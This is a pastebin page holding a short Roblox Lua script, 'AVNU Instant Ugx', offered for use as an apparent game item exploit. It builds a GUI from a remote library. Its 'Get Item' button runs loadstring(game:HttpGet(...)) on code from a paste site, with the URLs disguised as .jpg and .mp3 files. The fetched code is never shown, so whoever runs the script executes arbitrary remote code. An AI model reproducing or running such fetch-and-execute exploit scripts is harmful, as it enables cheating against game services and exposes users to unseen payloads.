R

avnu instant uwu

public
rrixh Apr 04, 2024 Never 49
Clone
Lua AVNU-instantUGc_lulaslollipop.jpg 13 lines (8 loc) | 446 Bytes
1
local player = game:GetService("Players").LocalPlayer
2
3
local Library = loadstring(game:HttpGet("https://pastecode.dev/raw/o579xt86/mobileWally.jpg",true))()
4
5
local uwu = Library:CreateWindow("AVNU Instant Ugx")
6
7
uwu:AddButton({text = "Get Item", callback = function()
8
loadstring(game:HttpGet("https://pastecode.dev/raw/v18n9k7b/AVNU-instantugx_lulaslollipop.mp3",true))()
9
end})
10
11
uwu:AddFolder("by lulaslollipop🍭")
12
13
Library:Init()